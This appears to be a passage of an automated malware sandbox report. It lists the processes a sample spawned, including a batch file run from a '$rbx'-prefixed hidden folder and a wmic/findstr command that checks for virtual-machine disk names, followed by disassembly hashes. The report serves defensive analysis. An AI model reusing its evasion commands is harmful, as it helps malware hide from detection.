                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:95
                                                                                                                                                        Start time:18:25:24
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
                                                                                                                                                        Imagebase:0x7ff6f7fc0000
                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:96
                                                                                                                                                        Start time:18:25:24
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
                                                                                                                                                        Imagebase:0x7ff6f7fc0000
                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:97
                                                                                                                                                        Start time:18:25:24
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
                                                                                                                                                        Imagebase:0x7ff6f7fc0000
                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:98
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:99
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:100
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:101
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:winlogon.exe
                                                                                                                                                        Imagebase:0x7ff779b10000
                                                                                                                                                        File size:906'240 bytes
                                                                                                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:102
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:103
                                                                                                                                                        Start time:18:25:26
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\lsass.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                        Imagebase:0x7ff6afc30000
                                                                                                                                                        File size:59'456 bytes
                                                                                                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FF7C143089D Relevance: 1.9, Strings: 1, Instructions: 617COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: P Q
                                                                                                                                                          • API String ID: 0-437629538
                                                                                                                                                          • Opcode ID: e3845140bd3cf7c2e10184745c9932d9389c21fe4dd4b185c3b51b911a2038f0
                                                                                                                                                          • Instruction ID: dc3d2756e9d06fe6b8ba764bae63e252fab982977dc73d5933cef4884439cef0
                                                                                                                                                          • Opcode Fuzzy Hash: e3845140bd3cf7c2e10184745c9932d9389c21fe4dd4b185c3b51b911a2038f0
                                                                                                                                                          • Instruction Fuzzy Hash: CA124530A18A494FE75CEF2D8484635B7D2FF9835579482BED44ACB29BDE74E8438780
                                                                                                                                                          Function 00007FF7C1430540 Relevance: 1.0, Instructions: 1017COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5db4c59eda1212bb86f1d3dc27be0bee33c8ca41ced76c650d2cb6b069714f30
                                                                                                                                                          • Instruction ID: 7b6a6ec3453a5668da040a776c83b05857332802163e916160f7d629c91f2b99
                                                                                                                                                          • Opcode Fuzzy Hash: 5db4c59eda1212bb86f1d3dc27be0bee33c8ca41ced76c650d2cb6b069714f30
                                                                                                                                                          • Instruction Fuzzy Hash: 9E62C270618A098FE718EE18C4849B5B3E2FF95365BA0467DD08BC7296DE35F943C790
                                                                                                                                                          Function 00007FF7C1430B40 Relevance: .5, Instructions: 514COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7169f7000c85a0bf654698275edcaeef1125dff971523bff4149f97b73e22ef8
                                                                                                                                                          • Instruction ID: cc9353cc08d6f96626ef16af3fa919550d960d82f10f6b78f7d2f532457a334f
                                                                                                                                                          • Opcode Fuzzy Hash: 7169f7000c85a0bf654698275edcaeef1125dff971523bff4149f97b73e22ef8
                                                                                                                                                          • Instruction Fuzzy Hash: B1F14331A18A454FE75CEF2D8885135B7D2FF8835579483BEC48ACB29BDE74E8038690
                                                                                                                                                          Function 00007FF7C1430508 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7a1df291f7558949af969b8681f43c7622073e7dbe3d5f1f13d49561b8466a02
                                                                                                                                                          • Instruction ID: 5f46e17cda7dbb86c66c98800341ab5a6e9f69ff63bb788d313de11536d6cd93
                                                                                                                                                          • Opcode Fuzzy Hash: 7a1df291f7558949af969b8681f43c7622073e7dbe3d5f1f13d49561b8466a02
                                                                                                                                                          • Instruction Fuzzy Hash: FBC1C030B18A098FE784FA698859B75B7D2EF99391FA441B9E10EC33D3CD68BC418751
                                                                                                                                                          Function 00007FF7C1430580 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: gfff
                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                          • Opcode ID: 8aed8d0868ba01e27b0e02187fc248d4da18517d7eaa27a1560a7a0c3c945940
                                                                                                                                                          • Instruction ID: 5108029a5641b32a99d361969a17efe38bafc91e69ddb4ca36827ffde16941e6
                                                                                                                                                          • Opcode Fuzzy Hash: 8aed8d0868ba01e27b0e02187fc248d4da18517d7eaa27a1560a7a0c3c945940
                                                                                                                                                          • Instruction Fuzzy Hash: E0614B70A1DA454FE309EB3888452A5F7E1FF9A351F8442BED08AC72D3DD68F9428781
                                                                                                                                                          Function 00007FF7C1431035 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 564d6ca6157bb01c6dc10a04e14fca4b26b360d20125e5ece33d26b72bc4fee8
                                                                                                                                                          • Instruction ID: 73dae3bde1ae9a201f2293500e027c33fc8c51e8fbfd0960eb08c613386e103b
                                                                                                                                                          • Opcode Fuzzy Hash: 564d6ca6157bb01c6dc10a04e14fca4b26b360d20125e5ece33d26b72bc4fee8
                                                                                                                                                          • Instruction Fuzzy Hash: 2CA1C2B0B18A868FE749AB3484546A2F7A1FF54355F4446BAD04FC3783DE28B516CB81
                                                                                                                                                          Function 00007FF7C1431789 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d6c565fbe7c5f0f8f0eac4e6595f3a9d8a43ca3a6a79000dc8dfef86c864c0c
                                                                                                                                                          • Instruction ID: 44039aab2f8e28a5d99356ffbdf0c2e744fcf738af185b3d47c9b99fc1cd7f33
                                                                                                                                                          • Opcode Fuzzy Hash: 5d6c565fbe7c5f0f8f0eac4e6595f3a9d8a43ca3a6a79000dc8dfef86c864c0c
                                                                                                                                                          • Instruction Fuzzy Hash: 2D81B070618A098FD75CFE18C485875B3E2FFA6365BA0467CD08B87296DE25F983C790
                                                                                                                                                          Function 00007FF7C14328CD Relevance: .3, Instructions: 273COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 00d4a853776beaef688f83a0b9a55d3d021b9e76ae0b584eeec3de7328cb4ad7
                                                                                                                                                          • Instruction ID: d2700492049ee5fab6f852d5d8cc019e9b3f27caa2a5ac9bfaf22e045df545fd
                                                                                                                                                          • Opcode Fuzzy Hash: 00d4a853776beaef688f83a0b9a55d3d021b9e76ae0b584eeec3de7328cb4ad7
                                                                                                                                                          • Instruction Fuzzy Hash: 04818170B18A058FE784FA6D8859B79F2C2EF99791FA481B9D10EC33D3CD68BC418651
                                                                                                                                                          Function 00007FF7C1431DA9 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 361828c04ba5bf04d800069550cf66dbe179179230f52710fdafefa3473e73da
                                                                                                                                                          • Instruction ID: 8d890863c4ddaa27b44d60bf5342a5b4e29d9458552f954d4bed15d2c7a0a605
                                                                                                                                                          • Opcode Fuzzy Hash: 361828c04ba5bf04d800069550cf66dbe179179230f52710fdafefa3473e73da
                                                                                                                                                          • Instruction Fuzzy Hash: C3510370618B098FE719EF18C4949B1B3A2FFA9354BA006BCC14BC76A1DE75F942CB50
                                                                                                                                                          Function 00007FF7C1432BF9 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bfb68c640a3f81edf212fef117361bdb23fbfa68e4cce094856164b058a4fa30
                                                                                                                                                          • Instruction ID: eacefee683da06afd6ba4537773ff5019b2db84f043420842bf25aa085379e52
                                                                                                                                                          • Opcode Fuzzy Hash: bfb68c640a3f81edf212fef117361bdb23fbfa68e4cce094856164b058a4fa30
                                                                                                                                                          • Instruction Fuzzy Hash: AA41FD30A1CA0D4FE798FB288454674B7D2EF893A0FA405BAD44EC32D7DE69AC428350
                                                                                                                                                          Function 00007FF7C1432D62 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0cccb44d8c8f0adde91754c081dbed207a8566faebec0273ed11457d8ec81d13
                                                                                                                                                          • Instruction ID: b640dbbc84624cc53059ab80ad410ad4049a9410f35fd0b9604fca997affdd3e
                                                                                                                                                          • Opcode Fuzzy Hash: 0cccb44d8c8f0adde91754c081dbed207a8566faebec0273ed11457d8ec81d13
                                                                                                                                                          • Instruction Fuzzy Hash: 91412F70A189498FDB88FF5CD459AACB7E2FF98361F444179E00DC3292DE64AC428755
                                                                                                                                                          Function 00007FF7C1430F66 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 492b7d5ff606055f08251a990311b3a8fe592741ad4900e7a2d7685821784c5c
                                                                                                                                                          • Instruction ID: 194e90a0b5f7185b88cdff4d78fd63162656a7b2af68a853114b12a62e6409aa
                                                                                                                                                          • Opcode Fuzzy Hash: 492b7d5ff606055f08251a990311b3a8fe592741ad4900e7a2d7685821784c5c
                                                                                                                                                          • Instruction Fuzzy Hash: BE21A211F0CD1D0BE398BD6C28653BDE2C2EB886A2FD4427EE14EC32C7DC989D464295
                                                                                                                                                          Function 00007FF7C1430568 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c0f0938553e80f6cb61ba6871d5058e8fa2ef2606e2a566ae3ee1586eaf79202
                                                                                                                                                          • Instruction ID: 1f7e570881445453fcbdf448c8fb73383e83c95f1420ca5a95c3bb6d2929ce80
                                                                                                                                                          • Opcode Fuzzy Hash: c0f0938553e80f6cb61ba6871d5058e8fa2ef2606e2a566ae3ee1586eaf79202
                                                                                                                                                          • Instruction Fuzzy Hash: AF113A6140DA992FE31ABA65DC4E8B3BF98DF9727075401BEE48983163E5862842C3B1
                                                                                                                                                          Function 00007FF7C1432CDD Relevance: .1, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc528477448575a5c233d8a5993078bae221e7dd4ad14c65018d189f9c9e430a
                                                                                                                                                          • Instruction ID: 988c65da75b3fffa5a43240b67c7b93fc2f8e14c8b3ec22ffc12f82bed69187f
                                                                                                                                                          • Opcode Fuzzy Hash: fc528477448575a5c233d8a5993078bae221e7dd4ad14c65018d189f9c9e430a
                                                                                                                                                          • Instruction Fuzzy Hash: 2201493180DAD81FC3915B24881CAB67FE4EF46350F4902BBD449CB191DD6869058390
                                                                                                                                                          Function 00007FF7C14314E5 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b3a8835f1bd203fcf37e64be9982396813196e64fd91056c322eb5b3c89f32b5
                                                                                                                                                          • Instruction ID: bc07e3f64bac3c9e766eb54e08962cb8d99f86feb3831f70c1376bf13ce4de6e
                                                                                                                                                          • Opcode Fuzzy Hash: b3a8835f1bd203fcf37e64be9982396813196e64fd91056c322eb5b3c89f32b5
                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0F671D09B454FC7615B396C540927BF0EA9666038807BBD08AC7286ED2499478790
                                                                                                                                                          Function 00007FF7C14306F0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 85b3f4289beeb798e209dae9aff40a7aa4c84bbab099b34207d79b6a6914d1c8
                                                                                                                                                          • Instruction ID: 919b38ed310ea27db3b40d4f254d90a95ec1c9d145f2f8a573ea844cb04aa516
                                                                                                                                                          • Opcode Fuzzy Hash: 85b3f4289beeb798e209dae9aff40a7aa4c84bbab099b34207d79b6a6914d1c8
                                                                                                                                                          • Instruction Fuzzy Hash: 68F0E571C08E9C6FD7A4AA19880DBBE7BE4EB44751F80413EE40AE3250DD6069018790
                                                                                                                                                          Function 00007FF7C1432C99 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 21b3cdf9651fc17b21c1acf8ab8476a0116813e82bbbdefbff09832df80243ac
                                                                                                                                                          • Instruction ID: 872f3bc6fbe8938918b85d1383edc79b0452fce42c63af3e7e681aa0c480148a
                                                                                                                                                          • Opcode Fuzzy Hash: 21b3cdf9651fc17b21c1acf8ab8476a0116813e82bbbdefbff09832df80243ac
                                                                                                                                                          • Instruction Fuzzy Hash: 45E0D821B5CC1D1F9A94F73C5859A6566D5EBDC36175107F3E80CC7296DC64EC418381
                                                                                                                                                          Function 00007FF7C14306F8 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0502fa011711e8df4af3a5b09d6058db6b959c4503fddc4e15cb2009db750956
                                                                                                                                                          • Instruction ID: 1eeaacd5483fa2d7c4979bbbce286f8b755ce5030a64d8c2461da8056eb50f53
                                                                                                                                                          • Opcode Fuzzy Hash: 0502fa011711e8df4af3a5b09d6058db6b959c4503fddc4e15cb2009db750956
                                                                                                                                                          • Instruction Fuzzy Hash: 61E0DF20B18C0D1FAA94F62C8445A69A2C1EB8C3B0B9006B2E40DC3296DC68EC418380
                                                                                                                                                          Function 00007FF7C1432C49 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cf1c2c741f9f50d055c4e1c90e8563a39c8452ca616c73f6757834c2f4124ed0
                                                                                                                                                          • Instruction ID: a69f8af62426e018c470169ea0aae2bb8c6703c783d777a96fa50c5dbd4a3320
                                                                                                                                                          • Opcode Fuzzy Hash: cf1c2c741f9f50d055c4e1c90e8563a39c8452ca616c73f6757834c2f4124ed0
                                                                                                                                                          • Instruction Fuzzy Hash: C5D05E22B2C96909FB196A18B4916FDB790EB51379F54517AE80B802C7DC5B61828184

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00007FF7C1430500 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c6d8baa3011eec643e3404d83ec7217bb52701645a3c5b12787e699bcd466997
                                                                                                                                                          • Instruction ID: f254d2beeec246ba4f7e19f69816d628eeed78235e29a4f8d8683fdaa3c5bd6e
                                                                                                                                                          • Opcode Fuzzy Hash: c6d8baa3011eec643e3404d83ec7217bb52701645a3c5b12787e699bcd466997
                                                                                                                                                          • Instruction Fuzzy Hash: 0AB1AE3190D7890FD31ABE2898849B1BBD0EF96360B9501BED48EC7193E955B947C3A1

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:29.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:15
                                                                                                                                                          Total number of Limit Nodes:0
